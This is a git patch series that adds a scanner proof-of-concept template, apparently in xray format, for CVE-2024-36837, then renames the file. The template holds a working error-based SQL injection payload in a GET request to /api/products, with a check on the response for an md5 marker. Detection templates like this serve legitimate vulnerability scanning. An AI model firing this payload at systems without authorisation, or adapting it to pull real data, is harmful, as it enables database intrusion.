From 2fdf01123d0002d73fdd661c79ae71370ffce182 Mon Sep 17 00:00:00 2001
From: fkalis <110553194+WingBy-Fkalis@users.noreply.github.com>
Date: Mon, 23 Dec 2024 16:30:10 +0800
Subject: [PATCH 1/2] add cve-2024-36837.yaml

add cve-2024-36837.yaml
---
 pocs/cve-2024-36837.yaml | 22 ++++++++++++++++++++++
 1 file changed, 22 insertions(+)
 create mode 100644 pocs/cve-2024-36837.yaml

diff --git a/pocs/cve-2024-36837.yaml b/pocs/cve-2024-36837.yaml
new file mode 100644
index 000000000..218ad9b33
--- /dev/null
+++ b/pocs/cve-2024-36837.yaml
@@ -0,0 +1,22 @@
+name: poc-yaml-cve-2024-36837
+transport: http
+rules:
+  r0:
+    request:
+      method: GET
+      path: >-
+        /api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(123123)))),0x7e),3550)
+      follow_redirects: false
+      headers:
+        User-Agent: >-
+          Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
+          like Gecko) Chrome/70.0.3538.77 Safari/537.36
+    expression: >-
+      response.status == 200 &&
+      response.body_string.contains("4297f44b13955235245b2497399d7a93")
+expression: r0()
+detail:
+  author: fkalis
+  links:
+    - >-
+      https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/CVE-2024-36837%20%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0.md

From 802170d79d7ec071e7713d42e4d3d2280afa0030 Mon Sep 17 00:00:00 2001
From: fkalis <110553194+WingBy-Fkalis@users.noreply.github.com>
Date: Mon, 23 Dec 2024 16:35:44 +0800
Subject: [PATCH 2/2] Rename cve-2024-36837.yaml to cve-2024-36837.yml

---
 pocs/{cve-2024-36837.yaml => cve-2024-36837.yml} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename pocs/{cve-2024-36837.yaml => cve-2024-36837.yml} (100%)

diff --git a/pocs/cve-2024-36837.yaml b/pocs/cve-2024-36837.yml
similarity index 100%
rename from pocs/cve-2024-36837.yaml
rename to pocs/cve-2024-36837.yml